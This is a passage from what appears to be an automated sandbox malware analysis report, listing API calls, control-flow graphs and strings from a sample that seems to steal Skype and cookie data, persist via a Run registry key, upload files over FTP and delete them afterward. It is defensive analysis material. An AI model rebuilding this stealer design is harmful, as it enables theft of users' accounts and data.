      • sprintf.MSVCR90 ref: 00672B7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672B96
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672BC9
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BE6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,00000000), ref: 00672BF5
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672C03
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$V01@$??1?$basic_string@$??$?D@1@@std@@D@2@@0@V10@V?$basic_string@$??4?$basic_string@$??0?$basic_string@FindV01@@$File$CreateDirectoryNextY?$basic_string@$?erase@?$basic_string@V12@sprintf$CloseFirstMessageSend
      • String ID: $ $%s\%s$-$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$v_%d
      • API String ID: 970326703-3013915691
      • Opcode ID: dab75c9687abd72509e092ae575046c628990c26bb4811981924ff2e1da17b6b
      • Instruction ID: c1f549650d11e63609f74c269078daef78753a16952c09385b1d9ed496bf2d14
      • Opcode Fuzzy Hash: dab75c9687abd72509e092ae575046c628990c26bb4811981924ff2e1da17b6b
      • Instruction Fuzzy Hash: 08127B711087819FD728DB64DD59BEF7BAABB94305F00990CF58E832A1EB705588CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 485 673b90-673c19 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 486 673c47-673c64 485->486 487 673c1b 485->487 489 673e27-673e4a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpGetFileA 486->489 490 673c6a-673c85 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA 486->490 488 673c20-673c45 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 487->488 488->486 488->488 491 673e50-673eaf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen * 2 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 489->491 492 6740e9-67415e fopen fprintf * 3 fclose ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA DeleteFileA 489->492 493 674164-6741a0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 674bfc 490->493 494 673c8b-673cf0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen * 2 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 490->494 495 673eb5-673ec3 fgetc 491->495 492->493 497 673cf6-673d03 fgetc 494->497 498 674033-674037 495->498 499 673ec9-673eeb ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 495->499 501 673d94-673d98 497->501 502 673d09-673d2b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 497->502 504 674038-674046 feof 498->504 505 673f4e-673f61 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 499->505 506 673eed-673f26 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 499->506 503 673d99-673da6 feof 501->503 507 673d5f-673d7a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf 502->507 508 673d2d-673d5d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 fprintf 502->508 503->497 509 673dac-673e22 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf fclose * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 503->509 504->495 510 67404c-6740e7 fprintf * 3 fclose * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 504->510 513 673fa5-673fb8 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 505->513 514 673f63-673f85 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 505->514 516 67401c-674031 memset 506->516 529 673f2c-673f2e 506->529 515 673d7d-673d92 memset 507->515 508->515 509->493 510->493 513->516 517 673fba-673ff3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 513->517 514->516 524 673f8b-673fa3 call 671480 514->524 515->503 516->504 517->516 533 673ff5-673ff7 517->533 524->516 529->516 532 673f34-673f49 529->532 534 67400e-674019 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 532->534 533->516 535 673ff9-674009 533->535 534->516 535->534
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,26DFE5F7), ref: 00673BD4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\status.txt,FFFFFFFF), ref: 00673BF6
      • sprintf.MSVCR90 ref: 00673BFD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C10
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00673C2C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C3C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673C6A
      • FtpGetFileA.WININET(00000000,status.txt,00000000), ref: 00673C7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673C97
      • fopen.MSVCR90 ref: 00673CA4
      • fopen.MSVCR90 ref: 00673CB5
      • memset.MSVCR90 ref: 00673CC8
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673CD6
      • fgetc.MSVCR90 ref: 00673CFC
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00673D12
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(number,00000000), ref: 00673D23
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673D3B
      • fprintf.MSVCR90 ref: 00673D58
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673D65
      • fprintf.MSVCR90 ref: 00673D78
      • memset.MSVCR90 ref: 00673D8A
      • feof.MSVCR90 ref: 00673D9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673DB2
      • fprintf.MSVCR90 ref: 00673DC5
      • fclose.MSVCR90 ref: 00673DD4
      • fclose.MSVCR90 ref: 00673DDC
      • FtpPutFileA.WININET(00000000,00676A08,status.txt,00000002,00000000), ref: 00673DF6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673E03
      • DeleteFileA.KERNEL32(00000000), ref: 00673E0A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673E1C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673E27
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00673E34
      • FtpGetFileA.WININET(00000000,00000000), ref: 00673E42
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673E5C
      • fopen.MSVCR90 ref: 00673E69
      • fopen.MSVCR90 ref: 00673E7A
      • memset.MSVCR90 ref: 00673E8D
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673E9B
      • fgetc.MSVCR90 ref: 00673EBC
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00673ED2
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload skype,00000000), ref: 00673EE3
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673F11
        • Part of subcall function 006736A0: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 006736E2
        • Part of subcall function 006736A0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 006736FB
        • Part of subcall function 006736A0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000000), ref: 00673706
        • Part of subcall function 006736A0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673717
        • Part of subcall function 006736A0: atoi.MSVCR90(00000000), ref: 0067371E
        • Part of subcall function 006736A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673732
        • Part of subcall function 006736A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673744
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(find skype..), ref: 00673EFB
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(version,00000000), ref: 00673F59
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00673F71
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(data cookie), ref: 0067400E
      • memset.MSVCR90 ref: 00674029
      • feof.MSVCR90 ref: 0067403F
      • fprintf.MSVCR90 ref: 0067405D
      • fprintf.MSVCR90 ref: 0067406B
      • fprintf.MSVCR90 ref: 00674079
      • fclose.MSVCR90 ref: 00674087
      • fclose.MSVCR90 ref: 00674090
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067409F
      • FtpPutFileA.WININET(00000000,00676A08,00000000), ref: 006740B2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006740BF
      • DeleteFileA.KERNEL32(00000000), ref: 006740CC
      • DeleteFileA.KERNEL32(00676A08), ref: 006740D3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006740E1
      • fopen.MSVCR90 ref: 006740F3
      • fprintf.MSVCR90 ref: 0067410A
      • fprintf.MSVCR90 ref: 00674117
      • fprintf.MSVCR90 ref: 00674125
      • fclose.MSVCR90 ref: 0067412E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00674141
      • FtpPutFileA.WININET(00000000,00676A08,00000000), ref: 00674153
      • DeleteFileA.KERNEL32(00676A08), ref: 0067415E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674173
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??0?$basic_string@Filefprintf$??1?$basic_string@$V01@@fclosefopen$?find@?$basic_string@DeleteV01@memset$??4?$basic_string@?erase@?$basic_string@V12@Y?$basic_string@feoffgetc$MessageSendatoisprintf
      • String ID: $%s$data cookie$data skype$find cookie..$find skype..$number$number=%d$status.txt$upload cookie$upload cookie= $upload skype$upload skype= $v_%d\status.txt$version$version=
      • API String ID: 1209982451-2510806938
      • Opcode ID: 14f0bf0bde1fc706fb6e5402f31d5aac49cc73a4592f1ff76baf035f861d3089
      • Instruction ID: b96c748d8815765496898fa910f1313b909cc70b53913a64d2ab7a616a18cbc0
      • Opcode Fuzzy Hash: 14f0bf0bde1fc706fb6e5402f31d5aac49cc73a4592f1ff76baf035f861d3089
      • Instruction Fuzzy Hash: 4FF1D071654B00EFD318EF74DD4EB6A3BABEB44704F009419F54E932A1DBB5A884CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 538 671cb0-671d58 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpGetFileA 541 672096-6721a0 fopen ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf * 9 fclose ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA 538->541 542 671d5e-671e49 memset ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ fopen * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf * 5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 538->542 545 6721a6-6721ed DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 674bfc 541->545 543 671e80-671e90 fgetc 542->543 544 671e4b 542->544 546 671e96-671ec0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 543->546 547 671f2f-671f33 543->547 548 671e50-671e75 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 544->548 550 671ec6-671ed9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 546->550 551 671f4b-671fb2 fprintf * 2 546->551 552 671f34-671f40 feof 547->552 548->548 553 671e77 548->553 555 671fb4-672019 fprintf * 2 550->555 556 671edf-671ee4 550->556 557 67201a-67202d fprintf * 2 551->557 552->543 558 671f46 552->558 553->543 555->557 559 671ee6-671efb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fprintf 556->559 560 671efe-671f11 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 556->560 561 672030-672091 fclose * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpPutFileA DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 557->561 558->561 559->560 562 671f13 560->562 563 671f18-671f2d memset 560->563 561->545 562->563 563->552
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,26DFE5F7), ref: 00671CF4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\info.txt,FFFFFFFF,?), ref: 00671D1A
      • sprintf.MSVCR90 ref: 00671D27
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,006763D4,00000000,00000000,00000002,00000000), ref: 00671D42
      • FtpGetFileA.WININET(00000000,00000000), ref: 00671D50
      • memset.MSVCR90 ref: 00671D69
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671D75
      • fopen.MSVCR90 ref: 00671D97
      • fopen.MSVCR90 ref: 00671DA7
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671DB4
      • fprintf.MSVCR90 ref: 00671DC7
      • fprintf.MSVCR90 ref: 00671DD7
      • fprintf.MSVCR90 ref: 00671DE7
      • fprintf.MSVCR90 ref: 00671DF5
      • fprintf.MSVCR90 ref: 00671DFD
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00671E0B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,start=%d,?), ref: 00671E2A
      • sprintf.MSVCR90 ref: 00671E31
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671E40
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671E5C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671E6C
      • fgetc.MSVCR90 ref: 00671E85
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00671E9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671EAD
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(00000000), ref: 00671EB8
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(</info>,00000000), ref: 00671ED1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671EEC
      • fprintf.MSVCR90 ref: 00671EF9
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(<info>,00000000), ref: 00671F09
      • memset.MSVCR90 ref: 00671F25
      • feof.MSVCR90 ref: 00671F35
      • fprintf.MSVCR90 ref: 00671F58
      • fprintf.MSVCR90 ref: 00671F88
      • fprintf.MSVCR90 ref: 00672020
      • fprintf.MSVCR90 ref: 0067202B
      • fclose.MSVCR90 ref: 00672037
      • fclose.MSVCR90 ref: 0067203A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672049
      • FtpPutFileA.WININET(00000000,nf2,00000000), ref: 0067205C
      • DeleteFileA.KERNEL32(nf2), ref: 00672067
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672079
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067208B
      • fopen.MSVCR90 ref: 006720A0
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006720B1
      • fprintf.MSVCR90 ref: 006720C4
      • fprintf.MSVCR90 ref: 006720D4
      • fprintf.MSVCR90 ref: 006720E4
      • fprintf.MSVCR90 ref: 006720F3
      • fprintf.MSVCR90 ref: 006720FB
      • fprintf.MSVCR90 ref: 00672109
      • fprintf.MSVCR90 ref: 0067213C
      • fprintf.MSVCR90 ref: 0067216C
      • fprintf.MSVCR90 ref: 00672174
      • fclose.MSVCR90 ref: 0067217A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067218D
      • FtpPutFileA.WININET(00000000,006763D4,00000000), ref: 006721A0
      • DeleteFileA.KERNEL32(006763D4), ref: 006721AB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006721C0
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$fprintf$A?$basic_string@$File$??0?$basic_string@??1?$basic_string@?erase@?$basic_string@?find@?$basic_string@V12@fclosefopen$Deletememsetsprintf$??4?$basic_string@V01@feoffgetc
      • String ID: $ $%s$</info>$</info>$<info>$<info>$<info>$end = %2d.%02d.%04d - %2d:%02d$name = %s $nf2$start = %2d.%02d.%04d - %2d:%02d$start=%d$start=%d$upload cookie = %d $upload skype = %d $v_%d\info.txt$version = %d
      • API String ID: 2882178117-1130591389
      • Opcode ID: 96cb2d77533408d88f7309076ce55bfa83f0dd880aac6cd8253ece12daab6c33
      • Instruction ID: 0614523a3f57a7131160885ae83b0c8c0d343c15cbb1b179775ef8abed40f4de
      • Opcode Fuzzy Hash: 96cb2d77533408d88f7309076ce55bfa83f0dd880aac6cd8253ece12daab6c33
      • Instruction Fuzzy Hash: 11D1B071144B10AFD318AB65DC49EBB77EBEB85B01F00D409F54E921A1EBB85D84CB72

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 564 6728a7-6728ae 565 6728b0-6728b8 564->565 566 6728be-6728c6 565->566 567 672a09-672a1a FindNextFileA 565->567 566->567 568 6728cc-6728d4 566->568 567->565 569 672a20-672a35 FindNextFileA 567->569 568->567 570 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 568->570 571 672690-672698 569->571 572 672a3b-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 